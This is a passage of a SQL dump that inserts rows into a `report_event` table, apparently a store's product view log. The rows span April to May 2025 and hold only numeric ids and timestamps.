(16725, '2025-04-14 15:30:19', 1, 2062, 0, 1, 1),
(16726, '2025-04-14 20:10:46', 1, 2053, 0, 1, 1),
(16727, '2025-04-14 20:10:49', 1, 2060, 0, 1, 1),
(16728, '2025-04-14 20:10:57', 1, 2064, 0, 1, 1),
(16729, '2025-04-14 20:11:09', 1, 2058, 0, 1, 1),
(16730, '2025-04-14 20:11:13', 1, 2059, 0, 1, 1),
(16731, '2025-04-14 20:11:21', 1, 2055, 0, 1, 1),
(16732, '2025-04-14 23:11:26', 1, 2061, 0, 1, 1),
(16733, '2025-04-15 02:33:06', 1, 2054, 0, 1, 1),
(16734, '2025-04-15 02:33:09', 1, 2055, 0, 1, 1),
(16735, '2025-04-15 02:33:19', 1, 2064, 0, 1, 1),
(16736, '2025-04-15 02:33:21', 1, 2063, 0, 1, 1),
(16737, '2025-04-15 02:33:23', 1, 2062, 0, 1, 1),
(16738, '2025-04-15 02:33:26', 1, 2060, 0, 1, 1),
(16739, '2025-04-15 02:33:28', 1, 2059, 0, 1, 1),
(16740, '2025-04-15 02:33:30', 1, 2061, 0, 1, 1),
(16741, '2025-04-15 02:33:32', 1, 2058, 0, 1, 1),
(16742, '2025-04-15 09:59:32', 1, 2062, 0, 1, 1),
(16743, '2025-04-15 09:59:32', 1, 2064, 0, 1, 1),
(16744, '2025-04-15 11:59:20', 1, 2063, 0, 1, 1),
(16745, '2025-04-15 15:20:05', 1, 2062, 0, 1, 1),
(16746, '2025-04-15 20:15:26', 1, 2059, 0, 1, 1),
(16747, '2025-04-15 20:18:17', 1, 2064, 0, 1, 1),
(16748, '2025-04-15 23:12:39', 1, 2058, 0, 1, 1),
(16749, '2025-04-16 00:53:12', 1, 2061, 0, 1, 1),
(16750, '2025-04-16 01:18:13', 1, 2058, 0, 1, 1),
(16751, '2025-04-16 01:48:34', 1, 2053, 0, 1, 1),
(16752, '2025-04-16 03:01:43', 1, 2058, 0, 1, 1),
(16753, '2025-04-16 03:14:21', 1, 2055, 0, 1, 1),
(16754, '2025-04-16 04:11:52', 1, 2055, 0, 1, 1),
(16755, '2025-04-16 05:16:29', 1, 2060, 0, 1, 1),
(16756, '2025-04-16 07:37:16', 1, 2058, 0, 1, 1),
(16757, '2025-04-16 15:43:28', 1, 2062, 0, 1, 1),
(16758, '2025-04-16 16:02:02', 1, 2059, 0, 1, 1),
(16759, '2025-04-16 17:52:19', 1, 2058, 0, 1, 1),
(16760, '2025-04-16 17:58:19', 1, 2062, 0, 1, 1),
(16761, '2025-04-16 20:32:36', 1, 2064, 0, 1, 1),
(16762, '2025-04-16 20:38:43', 1, 2064, 0, 1, 1),
(16763, '2025-04-16 21:49:15', 1, 2060, 0, 1, 1),
(16764, '2025-04-16 21:57:42', 1, 2054, 0, 1, 1),
(16765, '2025-04-16 23:45:17', 1, 2061, 0, 1, 1),
(16766, '2025-04-17 03:53:49', 1, 2062, 0, 1, 1),
(16767, '2025-04-17 04:11:02', 1, 2063, 0, 1, 1),
(16768, '2025-04-17 04:22:36', 1, 2059, 0, 1, 1),
(16769, '2025-04-17 06:54:55', 1, 2064, 0, 1, 1),
(16770, '2025-04-17 08:38:55', 1, 2055, 0, 1, 1),
(16771, '2025-04-17 15:34:27', 1, 2062, 0, 1, 1),
(16772, '2025-04-18 01:06:35', 1, 2063, 0, 1, 1),
(16773, '2025-04-18 15:34:17', 1, 2062, 0, 1, 1),
(16774, '2025-04-18 18:41:52', 1, 2061, 0, 1, 1),
(16775, '2025-04-18 21:28:34', 1, 2061, 0, 1, 1),
(16776, '2025-04-18 22:26:06', 1, 2059, 0, 1, 1),
(16777, '2025-04-18 23:55:06', 1, 2062, 0, 1, 1),
(16778, '2025-04-19 03:08:40', 1, 2054, 0, 1, 1),
(16779, '2025-04-19 04:43:55', 1, 2055, 0, 1, 1),
(16780, '2025-04-19 08:44:55', 1, 2063, 0, 1, 1),
(16781, '2025-04-19 12:36:32', 1, 2060, 0, 1, 1),
(16782, '2025-04-19 13:53:39', 1, 2060, 0, 1, 1),
(16783, '2025-04-19 15:43:52', 1, 2062, 0, 1, 1),
(16784, '2025-04-19 15:51:21', 1, 2059, 0, 1, 1),
(16785, '2025-04-19 16:18:36', 1, 2055, 0, 1, 1),
(16786, '2025-04-19 16:59:41', 1, 2054, 0, 1, 1),
(16787, '2025-04-19 18:02:56', 1, 2063, 0, 1, 1),
(16788, '2025-04-19 18:49:59', 1, 2055, 0, 1, 1),
(16789, '2025-04-19 19:28:03', 1, 2054, 0, 1, 1),
(16790, '2025-04-20 00:53:05', 1, 2058, 0, 1, 1),
(16791, '2025-04-20 01:27:07', 1, 2061, 0, 1, 1),
(16792, '2025-04-20 02:27:20', 1, 2064, 0, 1, 1),
(16793, '2025-04-20 07:17:05', 1, 2058, 0, 1, 1),
(16794, '2025-04-20 13:30:33', 1, 2061, 0, 1, 1),
(16795, '2025-04-20 14:17:22', 1, 2059, 0, 1, 1),
(16796, '2025-04-20 15:15:26', 1, 2054, 0, 1, 1),
(16797, '2025-04-20 15:35:05', 1, 2062, 0, 1, 1),
(16798, '2025-04-20 16:00:42', 1, 2064, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(16799, '2025-04-20 18:01:55', 1, 2061, 0, 1, 1),
(16800, '2025-04-20 20:55:00', 1, 2058, 0, 1, 1),
(16801, '2025-04-21 05:17:45', 1, 2058, 0, 1, 1),
(16802, '2025-04-21 05:27:43', 1, 2055, 0, 1, 1),
(16803, '2025-04-21 06:01:01', 1, 2062, 0, 1, 1),
(16804, '2025-04-21 06:18:27', 1, 2058, 0, 1, 1),
(16805, '2025-04-21 07:02:41', 1, 2062, 0, 1, 1),
(16806, '2025-04-21 08:00:26', 1, 2059, 0, 1, 1),
(16807, '2025-04-21 14:00:34', 1, 2059, 0, 1, 1),
(16808, '2025-04-21 15:23:16', 1, 2054, 0, 1, 1),
(16809, '2025-04-21 15:37:02', 1, 2062, 0, 1, 1),
(16810, '2025-04-21 19:30:54', 1, 2064, 0, 1, 1),
(16811, '2025-04-21 21:33:44', 1, 2063, 0, 1, 1),
(16812, '2025-04-21 21:43:32', 1, 2059, 0, 1, 1),
(16813, '2025-04-21 22:10:24', 1, 2064, 0, 1, 1),
(16814, '2025-04-21 23:00:53', 1, 2062, 0, 1, 1),
(16815, '2025-04-22 00:01:49', 1, 2062, 0, 1, 1),
(16816, '2025-04-22 07:12:35', 1, 2064, 0, 1, 1),
(16817, '2025-04-22 07:23:02', 1, 2060, 0, 1, 1),
(16818, '2025-04-22 08:21:52', 1, 2060, 0, 1, 1),
(16819, '2025-04-22 08:33:07', 1, 2054, 0, 1, 1),
(16820, '2025-04-22 09:14:37', 1, 2062, 0, 1, 1),
(16821, '2025-04-22 09:30:48', 1, 2054, 0, 1, 1),
(16822, '2025-04-22 15:41:20', 1, 2062, 0, 1, 1),
(16823, '2025-04-22 15:49:52', 1, 2061, 0, 1, 1),
(16824, '2025-04-22 15:54:06', 1, 2061, 0, 1, 1),
(16825, '2025-04-23 01:39:15', 1, 2061, 0, 1, 1),
(16826, '2025-04-23 15:19:26', 1, 2062, 0, 1, 1),
(16827, '2025-04-23 18:50:20', 1, 2053, 0, 1, 1),
(16828, '2025-04-23 20:26:58', 1, 2063, 0, 1, 1),
(16829, '2025-04-23 20:27:06', 1, 2054, 0, 1, 1),
(16830, '2025-04-23 20:27:13', 1, 2061, 0, 1, 1),
(16831, '2025-04-23 20:27:29', 1, 2055, 0, 1, 1),
(16832, '2025-04-23 20:27:55', 1, 2062, 0, 1, 1),
(16833, '2025-04-24 05:17:24', 1, 2060, 0, 1, 1),
(16834, '2025-04-24 10:23:44', 1, 2053, 0, 1, 1),
(16835, '2025-04-24 15:22:56', 1, 2062, 0, 1, 1),
(16836, '2025-04-24 17:41:40', 1, 2058, 0, 1, 1),
(16837, '2025-04-25 01:43:26', 1, 2059, 0, 1, 1),
(16838, '2025-04-25 04:37:24', 1, 2058, 0, 1, 1),
(16839, '2025-04-25 04:37:27', 1, 2060, 0, 1, 1),
(16840, '2025-04-25 04:37:36', 1, 2060, 0, 1, 1),
(16841, '2025-04-25 04:37:39', 1, 2064, 0, 1, 1),
(16842, '2025-04-25 04:37:46', 1, 2054, 0, 1, 1),
(16843, '2025-04-25 13:12:38', 1, 2054, 0, 1, 1),
(16844, '2025-04-25 15:18:24', 1, 2062, 0, 1, 1),
(16845, '2025-04-25 17:51:10', 1, 2061, 0, 1, 1),
(16846, '2025-04-25 17:56:49', 1, 2058, 0, 1, 1),
(16847, '2025-04-25 18:09:04', 1, 2055, 0, 1, 1),
(16848, '2025-04-25 18:59:13', 1, 2061, 0, 1, 1),
(16849, '2025-04-25 20:04:35', 1, 2059, 0, 1, 1),
(16850, '2025-04-25 20:04:47', 1, 2058, 0, 1, 1),
(16851, '2025-04-26 01:32:47', 1, 2058, 0, 1, 1),
(16852, '2025-04-26 02:35:07', 1, 2062, 0, 1, 1),
(16853, '2025-04-26 05:52:35', 1, 2059, 0, 1, 1),
(16854, '2025-04-26 05:52:39', 1, 2053, 0, 1, 1),
(16855, '2025-04-26 06:42:41', 1, 2064, 0, 1, 1),
(16856, '2025-04-26 11:08:47', 1, 2061, 0, 1, 1),
(16857, '2025-04-26 15:50:08', 1, 2062, 0, 1, 1),
(16858, '2025-04-26 19:26:53', 1, 2061, 0, 1, 1),
(16859, '2025-04-26 19:26:53', 1, 2061, 0, 1, 1),
(16860, '2025-04-26 19:26:58', 1, 2060, 0, 1, 1),
(16861, '2025-04-27 00:27:30', 1, 2062, 0, 1, 1),
(16862, '2025-04-27 01:59:28', 1, 2063, 0, 1, 1),
(16863, '2025-04-27 04:28:18', 1, 2064, 0, 1, 1),
(16864, '2025-04-27 11:01:04', 1, 2055, 0, 1, 1),
(16865, '2025-04-27 11:26:08', 1, 2059, 0, 1, 1),
(16866, '2025-04-27 11:46:08', 1, 2064, 0, 1, 1),
(16867, '2025-04-27 11:54:46', 1, 2064, 0, 1, 1),
(16868, '2025-04-27 12:05:18', 1, 2060, 0, 1, 1),
(16869, '2025-04-27 12:26:47', 1, 2059, 0, 1, 1),
(16870, '2025-04-27 13:01:19', 1, 2064, 0, 1, 1),
(16871, '2025-04-27 13:05:26', 1, 2060, 0, 1, 1),
(16872, '2025-04-27 13:14:19', 1, 2054, 0, 1, 1),
(16873, '2025-04-27 14:15:23', 1, 2054, 0, 1, 1),
(16874, '2025-04-27 16:02:31', 1, 2062, 0, 1, 1),
(16875, '2025-04-27 23:17:53', 1, 2061, 0, 1, 1),
(16876, '2025-04-28 00:07:13', 1, 2060, 0, 1, 1),
(16877, '2025-04-28 00:07:17', 1, 2063, 0, 1, 1),
(16878, '2025-04-28 00:07:19', 1, 2058, 0, 1, 1),
(16879, '2025-04-28 00:07:22', 1, 2055, 0, 1, 1),
(16880, '2025-04-28 00:07:28', 1, 2061, 0, 1, 1),
(16881, '2025-04-28 00:07:32', 1, 2062, 0, 1, 1),
(16882, '2025-04-28 00:07:36', 1, 2054, 0, 1, 1),
(16883, '2025-04-28 00:07:38', 1, 2059, 0, 1, 1),
(16884, '2025-04-28 00:07:39', 1, 2064, 0, 1, 1),
(16885, '2025-04-28 15:30:38', 1, 2062, 0, 1, 1),
(16886, '2025-04-29 05:57:52', 1, 2064, 0, 1, 1),
(16887, '2025-04-29 08:23:32', 1, 2062, 0, 1, 1),
(16888, '2025-04-29 10:29:47', 1, 2064, 0, 1, 1),
(16889, '2025-04-29 16:00:06', 1, 2059, 0, 1, 1),
(16890, '2025-04-29 16:05:20', 1, 2062, 0, 1, 1),
(16891, '2025-04-29 20:45:47', 1, 2053, 0, 1, 1),
(16892, '2025-04-29 22:22:08', 1, 2059, 0, 1, 1),
(16893, '2025-04-30 03:30:27', 1, 2063, 0, 1, 1),
(16894, '2025-04-30 11:38:26', 1, 2055, 0, 1, 1),
(16895, '2025-04-30 15:33:18', 1, 2062, 0, 1, 1),
(16896, '2025-04-30 17:53:18', 1, 2062, 0, 1, 1),
(16897, '2025-04-30 21:37:48', 1, 2054, 0, 1, 1),
(16898, '2025-04-30 22:34:57', 1, 2063, 0, 1, 1),
(16899, '2025-04-30 22:34:57', 1, 2062, 0, 1, 1),
(16900, '2025-04-30 22:34:59', 1, 2061, 0, 1, 1),
(16901, '2025-04-30 23:15:17', 1, 2061, 0, 1, 1),
(16902, '2025-04-30 23:28:34', 1, 2058, 0, 1, 1),
(16903, '2025-05-01 00:17:57', 1, 2053, 0, 1, 1),
(16904, '2025-05-01 01:28:47', 1, 2053, 0, 1, 1),
(16905, '2025-05-01 02:49:42', 1, 2055, 0, 1, 1),
(16906, '2025-05-01 03:23:57', 1, 2055, 0, 1, 1),
(16907, '2025-05-01 06:02:08', 1, 2063, 0, 1, 1),
(16908, '2025-05-01 06:45:31', 1, 2060, 0, 1, 1),
(16909, '2025-05-01 08:06:56', 1, 2063, 0, 1, 1),
(16910, '2025-05-01 08:35:03', 1, 2058, 0, 1, 1),
(16911, '2025-05-01 09:08:02', 1, 2053, 0, 1, 1),
(16912, '2025-05-01 09:36:19', 1, 2055, 0, 1, 1),
(16913, '2025-05-01 10:51:59', 1, 2064, 0, 1, 1),
(16914, '2025-05-01 13:39:20', 1, 2060, 0, 1, 1),
(16915, '2025-05-01 16:06:43', 1, 2062, 0, 1, 1),
(16916, '2025-05-01 16:34:09', 1, 2058, 0, 1, 1),
(16917, '2025-05-01 16:54:15', 1, 2062, 0, 1, 1),
(16918, '2025-05-01 17:02:43', 1, 2063, 0, 1, 1),
(16919, '2025-05-01 18:15:36', 1, 2054, 0, 1, 1),
(16920, '2025-05-01 19:34:19', 1, 2054, 0, 1, 1),
(16921, '2025-05-01 20:17:55', 1, 2061, 0, 1, 1),
(16922, '2025-05-01 21:21:20', 1, 2063, 0, 1, 1),
(16923, '2025-05-01 21:31:42', 1, 2059, 0, 1, 1),
(16924, '2025-05-01 23:20:47', 1, 2064, 0, 1, 1),
(16925, '2025-05-01 23:20:48', 1, 2064, 0, 1, 1),
(16926, '2025-05-01 23:20:48', 1, 2059, 0, 1, 1),
(16927, '2025-05-01 23:20:48', 1, 2054, 0, 1, 1),
(16928, '2025-05-01 23:20:48', 1, 2064, 0, 1, 1),
(16929, '2025-05-01 23:20:48', 1, 2061, 0, 1, 1),
(16930, '2025-05-01 23:20:49', 1, 2058, 0, 1, 1),
(16931, '2025-05-01 23:21:27', 1, 2055, 0, 1, 1),
(16932, '2025-05-01 23:21:29', 1, 2053, 0, 1, 1),
(16933, '2025-05-01 23:21:31', 1, 2060, 0, 1, 1),
(16934, '2025-05-01 23:21:32', 1, 2063, 0, 1, 1),
(16935, '2025-05-01 23:21:33', 1, 2062, 0, 1, 1),
(16936, '2025-05-01 23:37:53', 1, 2061, 0, 1, 1),
(16937, '2025-05-02 03:25:16', 1, 2058, 0, 1, 1),
(16938, '2025-05-02 04:18:25', 1, 2064, 0, 1, 1),
(16939, '2025-05-02 04:18:26', 1, 2059, 0, 1, 1),
(16940, '2025-05-02 04:18:27', 1, 2064, 0, 1, 1),
(16941, '2025-05-02 04:18:28', 1, 2058, 0, 1, 1),
(16942, '2025-05-02 04:18:32', 1, 2054, 0, 1, 1),
(16943, '2025-05-02 04:18:33', 1, 2064, 0, 1, 1),
(16944, '2025-05-02 04:18:34', 1, 2061, 0, 1, 1),
(16945, '2025-05-02 04:19:06', 1, 2055, 0, 1, 1),
(16946, '2025-05-02 04:19:08', 1, 2063, 0, 1, 1),
(16947, '2025-05-02 04:19:10', 1, 2053, 0, 1, 1),
(16948, '2025-05-02 04:19:11', 1, 2060, 0, 1, 1),
(16949, '2025-05-02 04:19:12', 1, 2062, 0, 1, 1),
(16950, '2025-05-02 04:45:37', 1, 2064, 0, 1, 1),
(16951, '2025-05-02 06:38:41', 1, 2059, 0, 1, 1),
(16952, '2025-05-02 06:51:37', 1, 2062, 0, 1, 1),
(16953, '2025-05-02 07:19:01', 1, 2064, 0, 1, 1),
(16954, '2025-05-02 07:39:32', 1, 2062, 0, 1, 1),
(16955, '2025-05-02 07:48:01', 1, 2062, 0, 1, 1),
(16956, '2025-05-02 08:11:21', 1, 2054, 0, 1, 1),
(16957, '2025-05-02 09:19:39', 1, 2064, 0, 1, 1),
(16958, '2025-05-02 09:29:44', 1, 2060, 0, 1, 1),
(16959, '2025-05-02 10:09:11', 1, 2060, 0, 1, 1),
(16960, '2025-05-02 13:35:27', 1, 2058, 0, 1, 1),
(16961, '2025-05-02 13:54:03', 1, 2054, 0, 1, 1),
(16962, '2025-05-02 15:18:49', 1, 2062, 0, 1, 1),
(16963, '2025-05-02 16:08:11', 1, 2061, 0, 1, 1),
(16964, '2025-05-02 17:22:29', 1, 2064, 0, 1, 1),
(16965, '2025-05-02 17:34:56', 1, 2059, 0, 1, 1),
(16966, '2025-05-02 19:32:09', 1, 2058, 0, 1, 1),
(16967, '2025-05-03 01:32:34', 1, 2053, 0, 1, 1),
(16968, '2025-05-03 02:47:10', 1, 2058, 0, 1, 1),
(16969, '2025-05-03 15:52:26', 1, 2062, 0, 1, 1),
(16970, '2025-05-04 00:45:34', 1, 2062, 0, 1, 1),
(16971, '2025-05-04 06:57:27', 1, 2062, 0, 1, 1),
(16972, '2025-05-04 09:04:29', 1, 2054, 0, 1, 1),
(16973, '2025-05-04 14:24:36', 1, 2061, 0, 1, 1),
(16974, '2025-05-04 16:02:09', 1, 2062, 0, 1, 1),
(16975, '2025-05-05 01:34:56', 1, 2064, 0, 1, 1),
(16976, '2025-05-05 07:25:52', 1, 2055, 0, 1, 1),
(16977, '2025-05-05 08:49:13', 1, 2059, 0, 1, 1),
(16978, '2025-05-05 15:41:22', 1, 2062, 0, 1, 1),
(16979, '2025-05-05 16:32:25', 1, 2054, 0, 1, 1),
(16980, '2025-05-05 16:32:29', 1, 2055, 0, 1, 1),
(16981, '2025-05-05 16:32:32', 1, 2058, 0, 1, 1),
(16982, '2025-05-05 16:32:34', 1, 2059, 0, 1, 1),
(16983, '2025-05-05 16:32:37', 1, 2060, 0, 1, 1),
(16984, '2025-05-05 16:32:40', 1, 2061, 0, 1, 1),
(16985, '2025-05-05 16:32:43', 1, 2062, 0, 1, 1),
(16986, '2025-05-05 16:32:47', 1, 2063, 0, 1, 1),
(16987, '2025-05-05 16:33:01', 1, 2064, 0, 1, 1),
(16988, '2025-05-05 16:33:04', 1, 2064, 0, 1, 1),
(16989, '2025-05-05 16:33:07', 1, 2064, 0, 1, 1),
(16990, '2025-05-05 19:58:29', 1, 2054, 0, 1, 1),
(16991, '2025-05-05 19:58:32', 1, 2054, 0, 1, 1),
(16992, '2025-05-05 19:58:35', 4, 2054, 3139, 1, 1),
(16993, '2025-05-05 22:36:22', 1, 2061, 0, 1, 1),
(16994, '2025-05-05 22:43:03', 1, 2058, 0, 1, 1),
(16995, '2025-05-05 22:48:37', 1, 2061, 0, 1, 1),
(16996, '2025-05-05 22:54:44', 1, 2055, 0, 1, 1),
(16997, '2025-05-05 23:35:38', 1, 2053, 0, 1, 1),
(16998, '2025-05-06 00:54:49', 1, 2063, 0, 1, 1),
(16999, '2025-05-06 03:39:59', 1, 2055, 0, 1, 1),
(17000, '2025-05-06 08:20:08', 1, 2059, 0, 1, 1),
(17001, '2025-05-06 15:20:03', 1, 2062, 0, 1, 1),
(17002, '2025-05-06 16:33:04', 1, 2064, 0, 1, 1),
(17003, '2025-05-06 16:43:25', 1, 2064, 0, 1, 1),
(17004, '2025-05-06 16:53:44', 1, 2060, 0, 1, 1),
(17005, '2025-05-06 17:35:55', 1, 2062, 0, 1, 1),
(17006, '2025-05-06 18:38:31', 1, 2062, 0, 1, 1),
(17007, '2025-05-06 19:19:39', 1, 2059, 0, 1, 1),
(17008, '2025-05-07 00:40:45', 1, 2058, 0, 1, 1),
(17009, '2025-05-07 04:07:28', 1, 2063, 0, 1, 1),
(17010, '2025-05-07 04:18:19', 1, 2059, 0, 1, 1),
(17011, '2025-05-07 05:02:56', 1, 2061, 0, 1, 1),
(17012, '2025-05-07 05:03:04', 1, 2061, 0, 1, 1),
(17013, '2025-05-07 05:03:04', 1, 2061, 0, 1, 1),
(17014, '2025-05-07 07:05:01', 1, 2060, 0, 1, 1),
(17015, '2025-05-07 09:44:48', 1, 2059, 0, 1, 1),
(17016, '2025-05-07 11:41:00', 1, 2055, 0, 1, 1),
(17017, '2025-05-07 12:51:51', 1, 2054, 0, 1, 1),
(17018, '2025-05-07 13:06:37', 1, 2054, 0, 1, 1),
(17019, '2025-05-07 14:04:56', 1, 2063, 0, 1, 1),
(17020, '2025-05-07 14:12:27', 1, 2054, 0, 1, 1),
(17021, '2025-05-07 15:47:50', 1, 2062, 0, 1, 1),
(17022, '2025-05-07 17:07:54', 1, 2053, 0, 1, 1),
(17023, '2025-05-07 21:34:30', 1, 2054, 0, 1, 1),
(17024, '2025-05-07 22:40:53', 1, 2063, 0, 1, 1),
(17025, '2025-05-07 22:40:56', 1, 2061, 0, 1, 1),
(17026, '2025-05-07 22:40:57', 1, 2062, 0, 1, 1),
(17027, '2025-05-08 01:20:06', 1, 2061, 0, 1, 1),
(17028, '2025-05-08 01:20:06', 1, 2064, 0, 1, 1),
(17029, '2025-05-08 01:20:06', 1, 2064, 0, 1, 1),
(17030, '2025-05-08 01:20:06', 1, 2064, 0, 1, 1),
(17031, '2025-05-08 01:20:06', 1, 2063, 0, 1, 1),
(17032, '2025-05-08 01:20:34', 1, 2058, 0, 1, 1),
(17033, '2025-05-08 01:20:44', 1, 2062, 0, 1, 1),
(17034, '2025-05-08 01:20:46', 1, 2053, 0, 1, 1),
(17035, '2025-05-08 01:20:47', 1, 2060, 0, 1, 1),
(17036, '2025-05-08 01:20:49', 1, 2059, 0, 1, 1),
(17037, '2025-05-08 01:20:50', 1, 2054, 0, 1, 1),
(17038, '2025-05-08 01:20:51', 1, 2055, 0, 1, 1),
(17039, '2025-05-08 01:20:55', 1, 2053, 0, 1, 1),
(17040, '2025-05-08 01:20:57', 1, 2053, 0, 1, 1),
(17041, '2025-05-08 04:56:21', 1, 2058, 0, 1, 1),
(17042, '2025-05-08 05:18:38', 1, 2061, 0, 1, 1),
(17043, '2025-05-08 06:05:31', 1, 2061, 0, 1, 1),
(17044, '2025-05-08 07:56:10', 1, 2058, 0, 1, 1),
(17045, '2025-05-08 08:46:08', 1, 2058, 0, 1, 1),
(17046, '2025-05-08 13:46:17', 1, 2060, 0, 1, 1),
(17047, '2025-05-08 15:04:49', 1, 2064, 0, 1, 1),
(17048, '2025-05-08 15:04:50', 1, 2064, 0, 1, 1),
(17049, '2025-05-08 15:04:52', 1, 2063, 0, 1, 1),
(17050, '2025-05-08 15:04:53', 1, 2064, 0, 1, 1),
(17051, '2025-05-08 15:04:53', 1, 2061, 0, 1, 1),
(17052, '2025-05-08 15:05:17', 1, 2058, 0, 1, 1),
(17053, '2025-05-08 15:05:27', 1, 2060, 0, 1, 1),
(17054, '2025-05-08 15:05:28', 1, 2053, 0, 1, 1),
(17055, '2025-05-08 15:05:30', 1, 2062, 0, 1, 1),
(17056, '2025-05-08 15:05:31', 1, 2059, 0, 1, 1),
(17057, '2025-05-08 15:05:32', 1, 2054, 0, 1, 1),
(17058, '2025-05-08 15:05:33', 1, 2055, 0, 1, 1),
(17059, '2025-05-08 15:05:39', 1, 2053, 0, 1, 1),
(17060, '2025-05-08 15:05:41', 1, 2053, 0, 1, 1),
(17061, '2025-05-08 15:42:38', 1, 2062, 0, 1, 1),
(17062, '2025-05-08 19:43:06', 1, 2054, 0, 1, 1),
(17063, '2025-05-08 22:19:08', 1, 2061, 0, 1, 1),
(17064, '2025-05-08 23:20:19', 1, 2062, 0, 1, 1),
(17065, '2025-05-09 00:32:31', 1, 2064, 0, 1, 1),
(17066, '2025-05-09 00:39:21', 1, 2061, 0, 1, 1),
(17067, '2025-05-09 04:11:47', 1, 2054, 0, 1, 1),
(17068, '2025-05-09 04:36:21', 1, 2064, 0, 1, 1),
(17069, '2025-05-09 06:41:39', 1, 2059, 0, 1, 1),
(17070, '2025-05-09 07:29:46', 1, 2060, 0, 1, 1),
(17071, '2025-05-09 10:33:21', 1, 2063, 0, 1, 1),
(17072, '2025-05-09 15:45:34', 1, 2062, 0, 1, 1),
(17073, '2025-05-09 16:14:33', 1, 2060, 0, 1, 1),
(17074, '2025-05-09 17:46:25', 1, 2059, 0, 1, 1),
(17075, '2025-05-09 19:47:06', 1, 2058, 0, 1, 1),
(17076, '2025-05-09 21:19:42', 1, 2061, 0, 1, 1),
(17077, '2025-05-09 21:42:16', 1, 2055, 0, 1, 1),
(17078, '2025-05-09 21:43:40', 1, 2061, 0, 1, 1),
(17079, '2025-05-10 01:32:41', 1, 2053, 0, 1, 1),
(17080, '2025-05-10 02:37:49', 1, 2059, 0, 1, 1),
(17081, '2025-05-10 03:37:53', 1, 2060, 0, 1, 1),
(17082, '2025-05-10 08:40:16', 1, 2054, 0, 1, 1),
(17083, '2025-05-10 09:00:13', 1, 2064, 0, 1, 1),
(17084, '2025-05-10 09:11:20', 1, 2062, 0, 1, 1),
(17085, '2025-05-10 11:36:12', 1, 2054, 0, 1, 1),
(17086, '2025-05-10 15:44:02', 1, 2062, 0, 1, 1),
(17087, '2025-05-10 16:20:02', 1, 2054, 0, 1, 1),
(17088, '2025-05-10 16:20:09', 1, 2055, 0, 1, 1),
(17089, '2025-05-10 16:20:21', 1, 2064, 0, 1, 1),
(17090, '2025-05-10 16:20:25', 1, 2063, 0, 1, 1),
(17091, '2025-05-10 16:20:28', 1, 2062, 0, 1, 1),
(17092, '2025-05-10 16:20:30', 1, 2060, 0, 1, 1),
(17093, '2025-05-10 16:20:32', 1, 2059, 0, 1, 1),
(17094, '2025-05-10 16:20:36', 1, 2061, 0, 1, 1),
(17095, '2025-05-10 16:20:40', 1, 2058, 0, 1, 1),
(17096, '2025-05-10 18:31:01', 1, 2058, 0, 1, 1),
(17097, '2025-05-10 20:37:21', 1, 2061, 0, 1, 1),
(17098, '2025-05-10 20:58:34', 1, 2061, 0, 1, 1),
(17099, '2025-05-10 21:12:44', 1, 2058, 0, 1, 1),
(17100, '2025-05-10 22:00:13', 1, 2061, 0, 1, 1),
(17101, '2025-05-10 22:07:06', 1, 2058, 0, 1, 1),
(17102, '2025-05-10 22:11:50', 1, 2053, 0, 1, 1),
(17103, '2025-05-10 23:01:16', 1, 2055, 0, 1, 1),
(17104, '2025-05-10 23:21:01', 1, 2055, 0, 1, 1),
(17105, '2025-05-11 04:03:23', 1, 2054, 0, 1, 1),
(17106, '2025-05-11 04:49:18', 1, 2053, 0, 1, 1),
(17107, '2025-05-11 05:13:35', 1, 2063, 0, 1, 1),
(17108, '2025-05-11 05:13:38', 1, 2062, 0, 1, 1),
(17109, '2025-05-11 05:13:44', 1, 2060, 0, 1, 1),
(17110, '2025-05-11 05:13:47', 1, 2059, 0, 1, 1),
(17111, '2025-05-11 06:24:42', 1, 2055, 0, 1, 1),
(17112, '2025-05-11 06:54:23', 1, 2055, 0, 1, 1),
(17113, '2025-05-11 11:05:12', 1, 2054, 0, 1, 1),
(17114, '2025-05-11 16:05:35', 1, 2062, 0, 1, 1),
(17115, '2025-05-11 16:12:46', 1, 2062, 0, 1, 1),
(17116, '2025-05-11 16:54:11', 1, 2064, 0, 1, 1),
(17117, '2025-05-11 17:03:31', 1, 2064, 0, 1, 1),
(17118, '2025-05-11 17:14:42', 1, 2062, 0, 1, 1),
(17119, '2025-05-11 17:42:45', 1, 2062, 0, 1, 1),
(17120, '2025-05-11 20:47:29', 1, 2060, 0, 1, 1),
(17121, '2025-05-11 23:25:23', 1, 2063, 0, 1, 1),
(17122, '2025-05-12 01:08:57', 1, 2060, 0, 1, 1),
(17123, '2025-05-12 01:33:49', 1, 2054, 0, 1, 1),
(17124, '2025-05-12 02:19:59', 1, 2054, 0, 1, 1),
(17125, '2025-05-12 02:51:12', 1, 2063, 0, 1, 1),
(17126, '2025-05-12 03:51:47', 1, 2059, 0, 1, 1),
(17127, '2025-05-12 04:44:44', 1, 2059, 0, 1, 1),
(17128, '2025-05-12 15:21:05', 1, 2062, 0, 1, 1),
(17129, '2025-05-12 15:50:59', 1, 2061, 0, 1, 1),
(17130, '2025-05-12 19:10:32', 1, 2060, 0, 1, 1),
(17131, '2025-05-12 19:31:01', 1, 2054, 0, 1, 1),
(17132, '2025-05-13 12:53:01', 1, 2064, 0, 1, 1),
(17133, '2025-05-13 15:31:15', 1, 2062, 0, 1, 1),
(17134, '2025-05-13 21:53:37', 1, 2054, 0, 1, 1),
(17135, '2025-05-13 23:51:04', 1, 2061, 0, 1, 1),
(17136, '2025-05-14 05:35:12', 1, 2058, 0, 1, 1),
(17137, '2025-05-14 05:35:26', 1, 2064, 0, 1, 1),
(17138, '2025-05-14 05:35:38', 1, 2062, 0, 1, 1),
(17139, '2025-05-14 05:35:40', 1, 2055, 0, 1, 1),
(17140, '2025-05-14 05:35:47', 1, 2059, 0, 1, 1),
(17141, '2025-05-14 05:35:48', 1, 2054, 0, 1, 1),
(17142, '2025-05-14 05:35:54', 1, 2063, 0, 1, 1),
(17143, '2025-05-14 05:35:57', 1, 2060, 0, 1, 1),
(17144, '2025-05-14 05:36:02', 1, 2061, 0, 1, 1),
(17145, '2025-05-14 05:36:27', 1, 2058, 0, 1, 1),
(17146, '2025-05-14 05:36:38', 1, 2064, 0, 1, 1),
(17147, '2025-05-14 05:36:42', 1, 2054, 0, 1, 1),
(17148, '2025-05-14 05:36:47', 1, 2060, 0, 1, 1),
(17149, '2025-05-14 05:36:52', 1, 2062, 0, 1, 1),
(17150, '2025-05-14 05:36:55', 1, 2061, 0, 1, 1),
